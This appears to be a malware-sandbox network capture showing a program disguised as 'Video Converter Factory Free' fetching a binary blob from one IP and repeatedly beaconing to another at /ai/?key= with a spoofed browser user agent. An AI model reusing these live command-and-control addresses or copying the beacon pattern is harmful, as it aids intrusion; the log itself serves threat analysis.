Data Raw: f1 d9 4a c0 19 06 38 38 48 c8 13 c0 87 51 f2 f6 75 36 43 c2 e3 fa 93 12 84 52 27 0c 74 f3 3f 7b e6 68 bd 72 0f b9 ba f4 04 75 87 9a 2e 05 41 d3 9c 5b e6 06 f0 00 03 b1 2c 26 44 dc 44 f5 b3 c0 dd 7e d5 70 91 45 b4 d6 f4 b4 71 5a 81 01 c7 f2 0a 08 3c ac 68 a3 22 3d 5d 0c a5 e0 12 93 b0 14 47 cd 04 b4 76 ea e3 95 b5 54 68 dd 23 61 5a 4a 1a 76 2e b2 56 cb f2 36 d1 05 a7 20 b4 f0 3b 4b e0 24 d1 25 17 bd 14 c9 dd 2a 87 bf 43 72 20 1f d3 ce da e1 e1 b2 f8 99 41 20 3f 24 3d 5c fa b4 56 58 ca 18 c4 62 e3 9c 08 42 cc d3 ad f6 8d e1 cb a3 85 0b 7a c6 65 20 20 35 19 3f d2 15 39 19 f8 97 c4 b0 97 85 bd b6 ab c3 e4 1c 42 d5 c9 29 2f 06 c0 02 25 f6 36 47 8e a1 8b 2b ad 23 57 4a 60 ca 77 d1 2d d7 21 77 3f 19 61 8e 6f 9d 25 b8 df 3f 0f b6 fb 20 82 d5 b8 c6 d2 09 7b 71 96 bc 5c 77 99 99 0f 85 fd 3e 87 8e 65 91 93 85 3c 55 36 bb 60 63 68 83 b4 73 2c 24 5e 42 fa 80 67 a0 3d a9 ae de 9d 83 e1 db 0d 30 a4 34 3e 72 0f 57 7c 02 1c 80 19 27 73 20 af c1 56 32 02 11 e6 97 33 12 65 cf 2a e4 58 c4 30 f1 3b 08 fa f5 37 62 1a d0 [TRUNCATED]
Data Ascii: J88HQu6CR't?{hru.A[,&DD~pEqZ<h"=]GvTh#aZJv.V6 ;K$%*Cr A ?$=\VXbBze 5?9B)/%6G+#WJ`w-!w?ao%? {q\w>e<U6`chs,$^Bg=04>rW|'s V23e*X0;7bRQmDPX=`exE.{u"}Nb@8;;^K"<U %[yrRwwQgPKpD=NDSJR&D9rvJ$zM/v"0mcdzKhu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49991 | 31.214.157.226 | 80 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 13:44:38.670474052 CET | 57 | OUT | GET /rand HTTP/1.1
Host: 31.214.157.226
Accept: */*
Dec 16, 2024 13:44:39.062680006 CET | 765 | IN | HTTP/1.1 200 OK
Server: nginx/1.27.0
Date: Mon, 16 Dec 2024 12:44:38 GMT
Content-Type: application/octet-stream
Content-Length: 512
Last-Modified: Fri, 02 Aug 2024 10:35:15 GMT
Connection: keep-alive
ETag: "66acb663-200"
Accept-Ranges: bytes
Data Raw: f1 d9 4a c0 19 06 38 38 48 c8 13 c0 87 51 f2 f6 75 36 43 c2 e3 fa 93 12 84 52 27 0c 74 f3 3f 7b e6 68 bd 72 0f b9 ba f4 04 75 87 9a 2e 05 41 d3 9c 5b e6 06 f0 00 03 b1 2c 26 44 dc 44 f5 b3 c0 dd 7e d5 70 91 45 b4 d6 f4 b4 71 5a 81 01 c7 f2 0a 08 3c ac 68 a3 22 3d 5d 0c a5 e0 12 93 b0 14 47 cd 04 b4 76 ea e3 95 b5 54 68 dd 23 61 5a 4a 1a 76 2e b2 56 cb f2 36 d1 05 a7 20 b4 f0 3b 4b e0 24 d1 25 17 bd 14 c9 dd 2a 87 bf 43 72 20 1f d3 ce da e1 e1 b2 f8 99 41 20 3f 24 3d 5c fa b4 56 58 ca 18 c4 62 e3 9c 08 42 cc d3 ad f6 8d e1 cb a3 85 0b 7a c6 65 20 20 35 19 3f d2 15 39 19 f8 97 c4 b0 97 85 bd b6 ab c3 e4 1c 42 d5 c9 29 2f 06 c0 02 25 f6 36 47 8e a1 8b 2b ad 23 57 4a 60 ca 77 d1 2d d7 21 77 3f 19 61 8e 6f 9d 25 b8 df 3f 0f b6 fb 20 82 d5 b8 c6 d2 09 7b 71 96 bc 5c 77 99 99 0f 85 fd 3e 87 8e 65 91 93 85 3c 55 36 bb 60 63 68 83 b4 73 2c 24 5e 42 fa 80 67 a0 3d a9 ae de 9d 83 e1 db 0d 30 a4 34 3e 72 0f 57 7c 02 1c 80 19 27 73 20 af c1 56 32 02 11 e6 97 33 12 65 cf 2a e4 58 c4 30 f1 3b 08 fa f5 37 62 1a d0 [TRUNCATED]
Data Ascii: J88HQu6CR't?{hru.A[,&DD~pEqZ<h"=]GvTh#aZJv.V6 ;K$%*Cr A ?$=\VXbBze 5?9B)/%6G+#WJ`w-!w?ao%? {q\w>e<U6`chs,$^Bg=04>rW|'s V23e*X0;7bRQmDPX=`exE.{u"}Nb@8;;^K"<U %[yrRwwQgPKpD=NDSJR&D9rvJ$zM/v"0mcdzKhu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49837 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:43:41 UTC | 283 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f3ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda30211ad3328b HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:43:42 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:43:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:43:42 UTC | 800 | IN | Data Raw: 33 31 34 0d 0a 38 62 37 32 33 63 36 38 65 65 31 38 34 30 33 63 36 36 30 66 62 66 65 30 33 38 34 63 32 37 62 36 62 63 38 66 38 30 32 32 34 63 62 64 33 62 63 31 39 30 32 34 39 66 37 65 31 36 66 65 30 34 64 64 65 37 36 37 34 62 62 33 35 63 38 64 31 65 33 66 37 38 37 61 61 30 61 66 30 64 39 62 66 35 30 31 64 32 39 39 62 31 63 61 32 39 37 34 64 35 66 36 34 63 63 34 39 36 66 63 35 32 64 36 64 62 39 63 35 66 61 64 62 36 66 34 63 31 30 33 30 32 63 33 64 34 31 62 31 66 64 64 33 31 33 61 31 62 64 32 33 32 39 32 64 35 64 30 39 31 35 37 34 39 63 39 37 30 33 34 66 32 64 34 30 33 34 62 36 64 31 36 36 63 63 63 66 37 31 31 36 38 62 62 66 37 35 36 61 34 65 66 65 62 35 32 61 61 37 66 63 31 63 32 33 66 66 34 66 37 63 37 66 32 34 38 31 32 38 64 34 36 39 39 33 65 61 35 33 37
Data Ascii: 3148b723c68ee18403c660fbfe0384c27b6bc8f80224cbd3bc190249f7e16fe04dde7674bb35c8d1e3f787aa0af0d9bf501d299b1ca2974d5f64cc496fc52d6db9c5fadb6f4c10302c3d41b1fdd313a1bd23292d5d0915749c97034f2d4034b6d166cccf71168bbf756a4efeb52aa7fc1c23ff4f7c7f248128d46993ea537


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49853 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:43:47 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:43:48 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:43:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:43:48 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49859 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:43:49 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:43:50 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:43:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:43:50 UTC | 656 | IN | Data Raw: 32 38 34 0d 0a 38 62 37 32 32 61 37 37 65 34 31 66 35 35 32 63 33 34 34 38 61 33 65 34 36 64 32 30 37 66 65 38 62 33 38 66 38 35 33 66 35 33 62 39 33 62 64 64 38 63 32 35 39 39 36 66 35 39 62 61 34 39 38 36 38 32 32 35 30 63 65 61 31 38 64 65 31 32 33 62 36 63 33 35 65 34 65 38 35 37 65 61 61 65 34 30 64 64 38 36 62 31 63 62 33 32 37 66 64 33 66 34 35 32 63 35 39 64 66 32 34 39 63 39 64 30 39 39 34 62 61 64 62 32 66 31 64 66 30 61 30 37 63 65 64 63 30 34 31 65 64 65 33 33 32 66 31 65 64 62 32 65 38 64 64 30 64 33 38 61 35 66 34 61 63 62 36 65 33 37 66 39 64 37 30 35 35 35 36 66 31 30 37 39 63 63 66 34 31 63 36 38 62 66 66 30 34 31 61 61 65 66 66 35 35 33 61 63 37 33 63 63 63 62 32 31 66 35 66 33 63 64 65 34 34 38 30 65 38 64 35 38 39 38 32 30 61 65 33 32
Data Ascii: 2848b722a77e41f552c3448a3e46d207fe8b38f853f53b93bdd8c25996f59ba498682250cea18de123b6c35e4e857eaae40dd86b1cb327fd3f452c59df249c9d0994badb2f1df0a07cedc041ede332f1edb2e8dd0d38a5f4acb6e37f9d705556f1079ccf41c68bff041aaeff553ac73cccb21f5f3cde4480e8d589820ae32


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49866 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:43:52 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:43:52 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:43:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:43:52 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49872 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:43:54 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:43:55 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:43:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:43:55 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49878 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:43:56 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:43:57 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:43:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:43:57 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49884 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:43:59 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:43:59 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:43:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:43:59 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.9 | 49890 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:01 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:02 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:02 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.9 | 49896 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:03 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:04 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:04 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.9 | 49902 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:06 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:06 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:06 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.9 | 49908 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:08 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:09 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:09 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.9 | 49914 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:10 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:11 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:11 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.9 | 49921 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:13 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:13 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:13 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.9 | 49928 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:15 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:16 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:16 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.9 | 49935 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:17 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:18 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:18 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.9 | 49943 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:20 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:20 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:20 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.9 | 49949 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:22 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:23 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:23 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.9 | 49955 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:24 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:25 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
2024-12-16 12:44:25 UTC | 24 | IN | Data Raw: 65 0d 0a 38 62 37 32 33 36 36 33 65 63 31 33 32 35 0d 0a 30 0d 0a 0d 0a
Data Ascii: e8b723663ec13250


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.9 | 49961 | 188.119.66.185 | 443 | 7880 | C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:44:27 UTC | 291 | OUT | GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9fa6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73389d7d2965a HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 188.119.66.185
2024-12-16 12:44:28 UTC | 200 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 16 Dec 2024 12:44:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/7.4.33
